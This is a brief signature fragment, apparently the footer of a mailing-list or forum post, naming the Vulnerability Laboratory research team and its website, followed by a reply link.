VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
[ reply ]